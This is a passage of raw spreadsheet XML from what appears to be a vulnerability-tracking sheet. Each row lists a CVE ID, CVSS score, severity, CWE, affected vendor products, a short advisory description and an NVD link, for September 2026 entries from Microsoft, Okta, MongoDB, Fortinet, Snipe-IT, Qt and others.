s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45528</t></is></c></row><row r="818"><c r="A818" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B818" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C818" s="5" t="inlineStr"><is><t>CVE-2026-69477</t></is></c><c r="D818" s="5" t="n"><v>7.3</v></c><c r="E818" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F818" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G818" s="5" t="inlineStr" /><c r="H818" s="5" t="n"><v>0.004</v></c><c r="I818" s="5" t="inlineStr" /><c r="J818" s="5" t="inlineStr" /><c r="K818" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L818" s="5" t="inlineStr" /><c r="M818" s="5" t="inlineStr" /><c r="N818" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O818" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P818" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q818" s="5" t="inlineStr" /><c r="R818" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S818" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an authorized attacker to execute code locally.</t></is></c><c r="T818" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69477</t></is></c></row><row r="819"><c r="A819" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B819" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C819" s="5" t="inlineStr"><is><t>CVE-2026-78627</t></is></c><c r="D819" s="5" t="n"><v>7.3</v></c><c r="E819" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F819" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G819" s="5" t="inlineStr" /><c r="H819" s="5" t="n"><v>0.001</v></c><c r="I819" s="5" t="inlineStr" /><c r="J819" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K819" s="5" t="inlineStr" /><c r="L819" s="5" t="inlineStr" /><c r="M819" s="5" t="inlineStr" /><c r="N819" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O819" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P819" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q819" s="5" t="inlineStr" /><c r="R819" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="S819" s="5" t="inlineStr"><is><t>The Okta Hyperdrive Integration installer does not mask the OAuth client secret when passed as an MSI property. The credential is recorded in plaintext in the installer log, the Application Event Log, and the process command line, all of which are readable by an authenticated local user on the workstation.</t></is></c><c r="T819" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t></is></c></row><row r="820"><c r="A820" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B820" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C820" s="5" t="inlineStr"><is><t>CVE-2026-86806</t></is></c><c r="D820" s="5" t="n"><v>7.3</v></c><c r="E820" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F820" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G820" s="5" t="inlineStr" /><c r="H820" s="5" t="n"><v>0.005</v></c><c r="I820" s="5" t="inlineStr" /><c r="J820" s="5" t="inlineStr" /><c r="K820" s="5" t="inlineStr" /><c r="L820" s="5" t="inlineStr" /><c r="M820" s="5" t="inlineStr" /><c r="N820" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O820" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P820" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q820" s="5" t="inlineStr" /><c r="R820" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S820" s="5" t="inlineStr"><is><t>A weakness has been identified in opengeos GeoLibre up to 2.3.0. Impacted is the function _is_within_roots. This manipulation causes server-side request forgery. The attack can be initiated remotely. Upgrading to version 2.4.0 is recommended to address this issue. Patch name: b745f62e29fa37364686525a21eee5e5c0f8a369. It is recommended to upgrade the affected component.</t></is></c><c r="T820" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86806</t></is></c></row><row r="821"><c r="A821" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B821" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C821" s="5" t="inlineStr"><is><t>CVE-2026-76561</t></is></c><c r="D821" s="5" t="n"><v>7.2</v></c><c r="E821" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F821" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G821" s="5" t="inlineStr" /><c r="H821" s="5" t="n"><v>0.006</v></c><c r="I821" s="5" t="inlineStr" /><c r="J821" s="5" t="inlineStr" /><c r="K821" s="5" t="inlineStr" /><c r="L821" s="5" t="inlineStr" /><c r="M821" s="5" t="inlineStr" /><c r="N821" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O821" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P821" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q821" s="5" t="inlineStr" /><c r="R821" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S821" s="5" t="inlineStr"><is><t>A flaw was found in Dogtag PKI, as used by FreeIPA's certificate authority component. The certificate profile import functionality does not fully validate uploaded profile content beyond the profile ID. An authenticated user with CA Administrator privileges can exploit Dogtag's ExternalProcessConstraint mechanism to execute arbitrary commands with attacker-controlled environment variables, achieving code execution as the pkiuser account.</t></is></c><c r="T821" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76561</t></is></c></row><row r="822"><c r="A822" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B822" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C822" s="5" t="inlineStr"><is><t>CVE-2026-81349</t></is></c><c r="D822" s="5" t="n"><v>7.2</v></c><c r="E822" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F822" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G822" s="5" t="inlineStr" /><c r="H822" s="5" t="n"><v>0.007</v></c><c r="I822" s="5" t="inlineStr" /><c r="J822" s="5" t="inlineStr" /><c r="K822" s="5" t="inlineStr" /><c r="L822" s="5" t="inlineStr" /><c r="M822" s="5" t="inlineStr" /><c r="N822" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O822" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P822" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q822" s="5" t="inlineStr" /><c r="R822" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S822" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an os command ('os command injection') in Azure HDInsights allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T822" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81349</t></is></c></row><row r="823"><c r="A823" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B823" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C823" s="5" t="inlineStr"><is><t>CVE-2026-81806</t></is></c><c r="D823" s="5" t="n"><v>7.2</v></c><c r="E823" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F823" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G823" s="5" t="inlineStr" /><c r="H823" s="5" t="n"><v>0.002</v></c><c r="I823" s="5" t="inlineStr" /><c r="J823" s="5" t="inlineStr" /><c r="K823" s="5" t="inlineStr" /><c r="L823" s="5" t="inlineStr" /><c r="M823" s="5" t="inlineStr" /><c r="N823" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O823" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P823" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q823" s="5" t="inlineStr" /><c r="R823" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S823" s="5" t="inlineStr"><is><t>Server-Side Request Forgery (SSRF) vulnerability in John Darrel Hide My WP Ghost allows Server Side Request Forgery.

This issue affects Hide My WP Ghost: from n/a through 7.0.09.</t></is></c><c r="T823" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81806</t></is></c></row><row r="824"><c r="A824" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B824" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C824" s="5" t="inlineStr"><is><t>CVE-2026-82061</t></is></c><c r="D824" s="5" t="n"><v>7.2</v></c><c r="E824" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F824" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G824" s="5" t="inlineStr" /><c r="H824" s="5" t="n"><v>0.003</v></c><c r="I824" s="5" t="inlineStr" /><c r="J824" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K824" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L824" s="5" t="inlineStr" /><c r="M824" s="5" t="inlineStr" /><c r="N824" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O824" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P824" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q824" s="5" t="inlineStr" /><c r="R824" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S824" s="5" t="inlineStr"><is><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is></c><c r="T824" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t></is></c></row><row r="825"><c r="A825" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B825" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C825" s="5" t="inlineStr"><is><t>CVE-2026-82071</t></is></c><c r="D825" s="5" t="n"><v>7.2</v></c><c r="E825" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F825" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G825" s="5" t="inlineStr" /><c r="H825" s="5" t="n"><v>0.003</v></c><c r="I825" s="5" t="inlineStr" /><c r="J825" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K825" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L825" s="5" t="inlineStr" /><c r="M825" s="5" t="inlineStr" /><c r="N825" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O825" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P825" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q825" s="5" t="inlineStr" /><c r="R825" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S825" s="5" t="inlineStr"><is><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is></c><c r="T825" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t></is></c></row><row r="826"><c r="A826" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B826" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C826" s="5" t="inlineStr"><is><t>CVE-2026-84387</t></is></c><c r="D826" s="5" t="n"><v>7.2</v></c><c r="E826" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F826" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G826" s="5" t="inlineStr" /><c r="H826" s="5" t="n"><v>0.008999999999999999</v></c><c r="I826" s="5" t="inlineStr" /><c r="J826" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K826" s="5" t="inlineStr" /><c r="L826" s="5" t="inlineStr" /><c r="M826" s="5" t="inlineStr" /><c r="N826" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O826" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P826" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q826" s="5" t="inlineStr" /><c r="R826" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S826" s="5" t="inlineStr"><is><t>A improper neutralization of special elements used in a command ('command injection') vulnerability in Fortinet FortiSandbox 5.2.0, FortiSandbox 5.0.0 through 5.0.6, FortiSandbox 4.4.0 through 4.4.9 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t></is></c><c r="T826" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t></is></c></row><row r="827"><c r="A827" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B827" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C827" s="5" t="inlineStr"><is><t>CVE-2026-86733</t></is></c><c r="D827" s="5" t="n"><v>7.2</v></c><c r="E827" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F827" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G827" s="5" t="inlineStr" /><c r="H827" s="5" t="n"><v>0.003</v></c><c r="I827" s="5" t="inlineStr" /><c r="J827" s="5" t="inlineStr" /><c r="K827" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L827" s="5" t="inlineStr" /><c r="M827" s="5" t="inlineStr" /><c r="N827" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O827" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P827" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q827" s="5" t="inlineStr" /><c r="R827" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S827" s="5" t="inlineStr"><is><t>Snipe-IT before 8.7.0 streams the SQL entry from an uploaded backup archive directly into the MySQL/MariaDB command-line client (`mysql`) without the --binary-mode flag, so the client interprets lines beginning with backslash commands such as `\!` as local shell commands. An authenticated superadministrator who uploads a crafted ZIP backup (POST /admin/backups/upload) and triggers a restore (POST /admin/backups/restore/{filename}) without the optional `clean` sanitizer parameter — which is not applied by default because DB_SANITIZE_BY_DEFAULT is false — can execute arbitrary OS commands as the web application's operating-system user, exposing application secrets (including database credentials and APP_KEY) and allowing modification of application-writable files and data. Version 8.7.0 adds the --binary-mode flag to the client invocation.</t></is></c><c r="T827" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86733</t></is></c></row><row r="828"><c r="A828" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B828" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C828" s="5" t="inlineStr"><is><t>CVE-2026-11573</t></is></c><c r="D828" s="5" t="n"><v>7.1</v></c><c r="E828" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F828" s="5" t="inlineStr"><is><t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t></is></c><c r="G828" s="5" t="inlineStr" /><c r="H828" s="5" t="n"><v>0.004</v></c><c r="I828" s="5" t="inlineStr" /><c r="J828" s="5" t="inlineStr" /><c r="K828" s="5" t="inlineStr" /><c r="L828" s="5" t="inlineStr" /><c r="M828" s="5" t="inlineStr" /><c r="N828" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O828" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P828" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q828" s="5" t="inlineStr" /><c r="R828" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="S828" s="5" t="inlineStr"><is><t>Uncontrolled recursion (CWE-674) in the QDomDocument/QDomNode serialization path of the Qt XML module (QtXml, qtbase). QDomElementPrivate::save() and QDomNodePrivate::save() recurse mutually, consuming one stack frame per level of element nesting with no depth limit, no configurable bound and no error return. A document with deeply nested elements parses successfully but exhausts the call stack and terminates the process when serialized. Reachable via QDomDocument::toByteArray() (Qt 4.0 and later), QDomDocument::toString(), QDomDocument::toCString(), QDomNode::save(), and operator&lt;&lt;(QTextStream&amp;, const QDomNode&amp;). Denial of service only — no code execution and no memory disclosure.</t></is></c><c r="T828" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-11573</t></is></c></row><row r="829"><c r="A829" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B829" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C829" s="5" t="inlineStr"><is><t>CVE-2026-16769</t></is></c><c r="D829" s="5" t="n"><v>7.1</v></c><c r="E829" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F829" s="5" t="inlineStr"><is><t>product-security@silabs.com</t></is></c><c r="G829" s="5" t="inlineStr" /><c r="H829" s="5" t="n"><v>0.001</v></c><c r="I829" s="5" t="inlineStr" /><c r="J829" s="5" t="inlineStr" /><c r="K829" s="5" t="inlineStr" /><c r="L829" s="5" t="inlineStr" /><c r="M829" s="5" t="inlineStr" /><c r="N829" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O829" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P829" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q829" s="5" t="inlineStr" /><c r="R829" s="5" t="inlineStr"><is><t>CWE-440</t></is></c><c r="S829" s="5" t="inlineStr"><is><t>An unencrypted 'pause encryption request' message causes a denial of service in the in the RS9116W/SiWx917. See vulnerability B-E10 in the related paper below.</t></is></c><c r="T829" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16769</t></is></c></row><row r="830"><c r="A830" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B830" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C830" s="5" t="inlineStr"><is><t>CVE-2026-20293</t></is></c><c r="D830" s="5" t="n"><v>7.1</v></c><c r="E830" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F830" s="5" t="inlineStr"><is><t>psirt@cisco.com</t></is></c><c r="G830" s="5" t="inlineStr" /><c r="H830" s="5" t="n"><v>0.001</v></c><c r="I830" s="5" t="inlineStr" /><c r="J830" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K830" s="5" t="inlineStr" /><c r="L830" s="5" t="inlineStr" /><c r="M830" s="5" t="inlineStr" /><c r="N830" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O830" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P830" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q830" s="5" t="inlineStr" /><c r="R830" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="S830" s="5" t="inlineStr"><is><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is></c><c r="T830" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t></is></c></row><row r="831"><c r="A831" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B831" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C831" s="5" t="inlineStr"><is><t>CVE-2026-66305</t></is></c><c r="D831" s="5" t="n"><v>7.1</v></c><c r="E831" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F831" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G831" s="5" t="inlineStr" /><c r="H831" s="5" t="n"><v>0.003</v></c><c r="I831" s="5" t="inlineStr" /><c r="J831" s="5" t="inlineStr" /><c r="K831" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L831" s="5" t="inlineStr" /><c r="M831" s="5" t="inlineStr" /><c r="N831" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O831" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P831" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q831" s="5" t="inlineStr" /><c r="R831" s="5" t="inlineStr"><is><t>CWE-603</t></is></c><c r="S831" s="5" t="inlineStr"><is><t>Use of client-side authentication in Skype for Business allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T831" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66305</t></is></c></row><row r="832"><c r="A832" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B832" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C832" s="5" t="inlineStr"><is><t>CVE-2026-68835</t></is></c><c r="D832" s="5" t="n"><v>7.1</v></c><c r="E832" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F832" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G832" s="5" t="inlineStr" /><c r="H832" s="5" t="n"><v>0.005</v></c><c r="I832" s="5" t="inlineStr" /><c r="J832" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K83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32" s="5" t="inlineStr" /><c r="M832" s="5" t="inlineStr" /><c r="N832" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O832" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P832" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q832" s="5" t="inlineStr" /><c r="R832" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S832" s="5" t="inlineStr"><is><t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T832" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68835</t></is></c></row><row r="833"><c r="A833" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B833" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C833" s="5" t="inlineStr"><is><t>CVE-2026-68846</t></is></c><c r="D833" s="5" t="n"><v>7.1</v></c><c r="E833" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F833" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G833" s="5" t="inlineStr" /><c r="H833" s="5" t="n"><v>0.006</v></c><c r="I833" s="5" t="inlineStr" /><c r="J833" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K83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33" s="5" t="inlineStr" /><c r="M833" s="5" t="inlineStr" /><c r="N833" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O833" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P833" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q833" s="5" t="inlineStr" /><c r="R833" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S833" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T833" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t></is></c></row><row r="834"><c r="A834" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B834" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C834" s="5" t="inlineStr"><is><t>CVE-2026-68889</t></is></c><c r="D834" s="5" t="n"><v>7.1</v></c><c r="E834" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F834" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G834" s="5" t="inlineStr" /><c r="H834" s="5" t="n"><v>0.004</v></c><c r="I834" s="5" t="inlineStr" /><c r="J834" s="5" t="inlineStr" /><c r="K834" s="5" t="inlineStr" /><c r="L834" s="5" t="inlineStr" /><c r="M834" s="5" t="inlineStr" /><c r="N834" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O834" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P834" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q834" s="5" t="inlineStr" /><c r="R834" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S834" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T834" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68889</t></is></c></row><row r="835"><c r="A835" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B835" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C835" s="5" t="inlineStr"><is><t>CVE-2026-68893</t></is></c><c r="D835" s="5" t="n"><v>7.1</v></c><c r="E835" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F835" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G835" s="5" t="inlineStr" /><c r="H835" s="5" t="n"><v>0.005</v></c><c r="I835" s="5" t="inlineStr" /><c r="J835" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K835" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L835" s="5" t="inlineStr" /><c r="M835" s="5" t="inlineStr" /><c r="N835" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O835" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P835" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q835" s="5" t="inlineStr" /><c r="R835" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S835" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T835" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t></is></c></row><row r="836"><c r="A836" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B836" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C836" s="5" t="inlineStr"><is><t>CVE-2026-69272</t></is></c><c r="D836" s="5" t="n"><v>7.1</v></c><c r="E836" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F836" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G836" s="5" t="inlineStr" /><c r="H836" s="5" t="n"><v>0.004</v></c><c r="I836" s="5" t="inlineStr" /><c r="J836" s="5" t="inlineStr" /><c r="K836" s="5" t="inlineStr" /><c r="L836" s="5" t="inlineStr" /><c r="M836" s="5" t="inlineStr" /><c r="N836" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O836" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P836" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q836" s="5" t="inlineStr" /><c r="R836" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S836" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T836" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69272</t></is></c></row><row r="837"><c r="A837" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B837" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C837" s="5" t="inlineStr"><is><t>CVE-2026-69274</t></is></c><c r="D837" s="5" t="n"><v>7.1</v></c><c r="E837" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F837" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G837" s="5" t="inlineStr" /><c r="H837" s="5" t="n"><v>0.004</v></c><c r="I837" s="5" t="inlineStr" /><c r="J837" s="5" t="inlineStr" /><c r="K837" s="5" t="inlineStr" /><c r="L837" s="5" t="inlineStr" /><c r="M837" s="5" t="inlineStr" /><c r="N837" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O837" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P837" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q837" s="5" t="inlineStr" /><c r="R837" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S837" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T837" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69274</t></is></c></row><row r="838"><c r="A838" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B838" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C838" s="5" t="inlineStr"><is><t>CVE-2026-69296</t></is></c><c r="D838" s="5" t="n"><v>7.1</v></c><c r="E838" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F838" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G838" s="5" t="inlineStr" /><c r="H838" s="5" t="n"><v>0.005</v></c><c r="I838" s="5" t="inlineStr" /><c r="J838" s="5" t="inlineStr" /><c r="K838" s="5" t="inlineStr" /><c r="L838" s="5" t="inlineStr" /><c r="M838" s="5" t="inlineStr" /><c r="N838" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O838" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P838" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q838" s="5" t="inlineStr" /><c r="R838" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S838" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T838" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69296</t></is></c></row><row r="839"><c r="A839" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B839" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C839" s="5" t="inlineStr"><is><t>CVE-2026-69305</t></is></c><c r="D839" s="5" t="n"><v>7.1</v></c><c r="E839" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F839" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G839" s="5" t="inlineStr" /><c r="H839" s="5" t="n"><v>0.006</v></c><c 